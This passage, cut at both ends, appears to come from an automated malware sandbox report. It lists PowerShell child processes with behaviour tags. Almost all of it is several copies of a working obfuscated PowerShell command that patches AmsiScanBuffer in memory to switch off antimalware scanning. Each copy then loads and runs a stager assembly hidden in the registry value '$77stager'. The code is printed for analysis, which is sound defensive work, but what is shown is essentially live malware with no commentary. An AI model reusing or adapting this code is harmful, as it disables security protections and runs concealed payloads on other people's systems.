@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hvKSvQtZytQ=$bBwNqXGJXbYBi.GetMethod('G'+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+'du'+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+'e'+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$IaLbbIkmENMAaB=$qrPTNJwiqxjhaF.Invoke($Null,@([Object]$hvKSvQtZytQ,[Object]('L'+[Char](111)+''+'a'+'dL'+[Char](105)+''+'b'+''+'r'+'a'+'r'+''+'y'+''+[Char](65)+'')));$txtiiPItcOTMTtBIO=$qrPTNJwiqxjhaF.Invoke($Null,@([Object]$hvKSvQtZytQ,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+'u'+''+'a'+'l'+'P'+''+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+'t')));$CQovuDP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IaLbbIkmENMAaB,$XRNGWrOingMqfSvNImy).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+'l');$LHbstqgvYlgdGrzPN=$qrPTNJwiqxjhaF.Invoke($Null,@([Object]$CQovuDP,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+'ca'+'n'+'B'+[Char](117)+''+'f'+'fe'+'r'+'')));$ijctqxOegu=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($txtiiPItcOTMTtBIO,$CHZClnngHjbXUIjBOXzoPb).Invoke($LHbstqgvYlgdGrzPN,[uint32]8,4,[ref]$ijctqxOegu);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LHbstqgvYlgdGrzPN,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($txtiiPItcOTMTtBIO,$CHZClnngHjbXUIjBOXzoPb).Invoke($LHbstqgvYlgdGrzPN,[uint32]8,0x20,[ref]$ijctqxOegu);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+'T'+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+'7s'+[Char](116)+''+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                          2⤵
                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in System32 directory
                                          • Suspicious use of SetThreadContext
                                          • Modifies data under HKEY_USERS
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:864
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            3⤵
                                              PID:4984
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mThfjMizCduo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$bIYeRdbVeXnApj,[Parameter(Position=1)][Type]$PLFXIKuYZh)$JbsmyjEXjam=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+'e'+'g'+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+'r'+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+'p'+''+[Char](101)+'','C'+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'e'+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+'s'+'i'+''+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+','+'A'+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$JbsmyjEXjam.DefineConstructor(''+'R'+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$bIYeRdbVeXnApj).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'ti'+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$JbsmyjEXjam.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+'H'+''+[Char](105)+'d'+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+','+'N'+''+'e'+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+'t'+[Char](117)+'a'+[Char](108)+'',$PLFXIKuYZh,$bIYeRdbVeXnApj).SetImplementationFlags('R'+[Char](117)+'n'+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+''+'n'+''+'a'+'g'+'e'+''+'d'+'');Write-Output $JbsmyjEXjam.CreateType();}$UTRvTCAbWLXBh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+'r'+''+'o'+''+'s'+''+'o'+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+'nsa'+[Char](102)+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+'i'+''+'v'+''+'e'+''+[Char](77)+''+'e'+'th'+[Char](111)+''+'d'+''+[Char](115)+'');$jglMtqElEQBfkS=$UTRvTCAbWLXBh.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+'cA'+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+'a'+'t'+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$LvKwGHFNyIxeGxtBStv=mThfjMizCduo @([String])([IntPtr]);$tpfemICuylzFIHheQVTOzL=mThfjMizCduo @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ieFyNPnzwcQ=$UTRvTCAbWLXBh.GetMethod(''+'G'+'e'+'t'+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+'l'+'e'+[Char](72)+'a'+'n'+'dle').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+'d'+[Char](108)+''+[Char](108)+'')));$zkqKGQrozYOyYj=$jglMtqElEQBfkS.Invoke($Null,@([Object]$ieFyNPnzwcQ,[Object]('Lo'+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+'b'+[Char](114)+''+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$QtwfSyPExkwEjnesX=$jglMtqElEQBfkS.Invoke($Null,@([Object]$ieFyNPnzwcQ,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+'o'+'t'+[Char](101)+'c'+[Char](116)+'')));$JmQYOun=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zkqKGQrozYOyYj,$LvKwGHFNyIxeGxtBStv).Invoke(''+[Char](97)+''+'m'+'si'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$khtZAsNZghqvqcvkd=$jglMtqElEQBfkS.Invoke($Null,@([Object]$JmQYOun,[Object](''+[Char](65)+''+[Char](109)+'s'+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+'r'+'')));$EZLtCCfudJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QtwfSyPExkwEjnesX,$tpfemICuylzFIHheQVTOzL).Invoke($khtZAsNZghqvqcvkd,[uint32]8,4,[ref]$EZLtCCfudJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$khtZAsNZghqvqcvkd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QtwfSyPExkwEjnesX,$tpfemICuylzFIHheQVTOzL).Invoke($khtZAsNZghqvqcvkd,[uint32]8,0x20,[ref]$EZLtCCfudJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+'A'+[Char](82)+'E').GetValue('$'+[Char](55)+''+[Char](55)+''+[Char](115)+'t'+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                                            2⤵
                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                            • Command and Scripting Interpreter: PowerShell
                                            • Drops file in System32 directory
                                            • Suspicious use of SetThreadContext
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1808
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              3⤵
                                                PID:2164
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:VQCMiOllrcTy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$oXnKikxWMKhFrd,[Parameter(Position=1)][Type]$aNLlsTURsm)$BdCgpZEvRsd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+'o'+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+'l'+'e'+'',$False).DefineType('My'+'D'+'e'+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+'l'+''+[Char](97)+'s'+'s'+''+[Char](44)+''+'A'+'u'+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$BdCgpZEvRsd.DefineConstructor('R'+'T'+'S'+[Char](112)+'e'+[Char](99)+'i'+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+','+''+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+','+[Char](80)+''+'u'+''+'b'+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$oXnKikxWMKhFrd).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+'d');$BdCgpZEvRsd.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+'k'+'e'+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+'By'+'S'+'i'+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+'o'+'t'+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$aNLlsTURsm,$oXnKikxWMKhFrd).SetImplementationFlags('Ru'+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $BdCgpZEvRsd.CreateType();}$QjUWjpvbEWPqL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+'sa'+'f'+''+'e'+'N'+[Char](97)+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$ItmioOeAYXAJhv=$QjUWjpvbEWPqL.GetMethod(''+'G'+''+'e'+'t'+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$IVEtwOzdnKXMKHCxdaq=VQCMiOllrcTy @([String])([IntPtr]);$yfpUXnSEigtcOjXtgIuMlz=VQCMiOllrcTy @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$QFmFGtflpHw=$QjUWjpvbEWPqL.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'H'+[Char](97)+'n'+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+'r'+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+'.'+[Char](100)+'l'+'l'+'')));$SJnfYBwcAYVZSl=$ItmioOeAYXAJhv.Invoke($Null,@([Object]$QFmFGtflpHw,[Object]('L'+'o'+''+'a'+''+[Char](100)+'L'+[Char](105)+''+'b'+'r'+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$VMvxLhkdeOwoVjAPK=$ItmioOeAYXAJhv.Invoke($Null,@([Object]$QFmFGtflpHw,[Object]('V'+'i'+''+'r'+''+[Char](116)+''+[Char](117)+'al'+'P'+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$teTcDvT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SJnfYBwcAYVZSl,$IVEtwOzdnKXMKHCxdaq).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$gsxNIyTFByvjwuVnY=$ItmioOeAYXAJhv.Invoke($Null,@([Object]$teTcDvT,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$UOXSRnKeGU=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VMvxLhkdeOwoVjAPK,$yfpUXnSEigtcOjXtgIuMlz).Invoke($gsxNIyTFByvjwuVnY,[uint32]8,4,[ref]$UOXSRnKeGU);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$gsxNIyTFByvjwuVnY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VMvxLhkdeOwoVjAPK,$yfpUXnSEigtcOjXtgIuMlz).Invoke($gsxNIyTFByvjwuVnY,[uint32]8,0x20,[ref]$UOXSRnKeGU);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'FT'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                              2⤵
                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                              • Command and Scripting Interpreter: PowerShell
                                              • Drops file in System32 directory
                                              • Suspicious use of SetThreadContext
                                              • Modifies data under HKEY_USERS
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1828
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                3⤵
                                                  PID:1456
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:WfouwiEiLgyh{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$sRZdFDrlmETVdr,[Parameter(Position=1)][Type]$VfVSVfEgwH)$fcZxZlrmwVD=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+'d'+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InM'+[Char](101)+''+'m'+''+[Char](111)+''+'r'+''+[Char](121)+'Mo'+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+'e'+[Char](108)+''+[Char](101)+'ga'+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+',A'+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+'s'+'s,'+[Char](65)+''+'u'+''+[Char](116)+'o'+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$fcZxZlrmwVD.DefineConstructor(''+[Char](82)+'T'+[Char](83)+'pecia'+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$sRZdFDrlmETVdr).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+'t'+'ime,'+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$fcZxZlrmwVD.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+'l'+'i'+'c'+''+','+'Hid'+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+[Char](119)+'Slot'+[Char](44)+'V'+[Char](105)+''+'r'+'t'+'u'+''+[Char](97)+''+'l'+'',$VfVSVfEgwH,$sRZdFDrlmETVdr).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+'m'+'e'+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+'e'+''+'d'+'');Write-Output $fcZxZlrmwVD.CreateType();}$SUXnUzEYcjLeP=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+'m.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+''+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'sa'+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+'t'+'h'+[Char](111)+'d'+'s'+'');$tKrVQTiQLfGqVu=$SUXnUzEYcjLeP.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+'roc'+[Char](65)+'d'+[Char](100)+'r'+'e'+'s'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+'i'+'c'+',S'+'t'+'a'+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$tOpFtzRSswUScvEiHvG=WfouwiEiLgyh @([String])([IntPtr]);$QPxbsJGwywpYVKVyXupTJP=WfouwiEiLgyh @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$sDCUWoGbPDM=$SUXnUzEYcjLeP.GetMethod('G'+'e'+''+'t'+''+'M'+''+[Char](111)+''+'d'+'ul'+[Char](101)+'H'+[Char](97)+'n'+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+'3'+''+'2'+'.'+'d'+''+[Char](108)+''+[Char](108)+'')));$cnzTqoSpbuqVtO=$tKrVQTiQLfGqVu.Invoke($Null,@([Object]$sDCUWoGbPDM,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+'ra'+[Char](114)+''+'y'+''+'A'+'')));$ZeuQpIlWfaDQlLIAh=$tKrVQTiQLfGqVu.Invoke($Null,@([Object]$sDCUWoGbPDM,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+''+[Char](80)+'r'+'o'+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$MGUeAmE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cnzTqoSpbuqVtO,$tOpFtzRSswUScvEiHvG).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+'l');$ExHlvzZZHbqqOOhzC=$tKrVQTiQLfGqVu.Invoke($Null,@([Object]$MGUeAmE,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+'c'+'a'+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$fkhnKFEsYZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZeuQpIlWfaDQlLIAh,$QPxbsJGwywpYVKVyXupTJP).Invoke($ExHlvzZZHbqqOOhzC,[uint32]8,4,[ref]$fkhnKFEsYZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ExHlvzZZHbqqOOhzC,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZeuQpIlWfaDQlLIAh,$QPxbsJGwywpYVKVyXupTJP).Invoke($ExHlvzZZHbqqOOhzC,[uint32]8,0x20,[ref]$fkhnKFEsYZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+''+'W'+'A'+[Char](82)+'E').GetValue(''+'$'+''+[Char](55)+'7stag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                                2⤵
                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops file in System32 directory
                                                • Suspicious use of SetThreadContext
                                                • Modifies data under HKEY_USERS
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4324
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  3⤵
                                                    PID:2536
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JXrFIEVYjveE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rEcvsvTSpuGYgk,[Parameter(Position=1)][Type]$FRGnqrMHMX)$NFToseNOaRH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+'e'+'m'+'o'+[Char](114)+'yM'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+'e'+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+'e'+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+'ubl'+[Char](105)+'c,S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+'A'+'n'+'s'+''+[Char](105)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+','+''+'A'+'u'+[Char](116)+'oC'+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$NFToseNOaRH.DefineConstructor(''+[Char](82)+'T'+'S'+''+'p'+''+[Char](101)+''+'c'+'i'+'a'+''+'l'+''+'N'+''+[Char](97)+'m'+'e'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$rEcvsvTSpuGYgk).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+[Char](100)+'');$NFToseNOaRH.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+'ke',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+'H'+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+''+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$FRGnqrMHMX,$rEcvsvTSpuGYgk).SetImplementationFlags(''+'R'+'u'+'n'+'ti'+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+'a'+'g'+''+'e'+'d');Write-Output 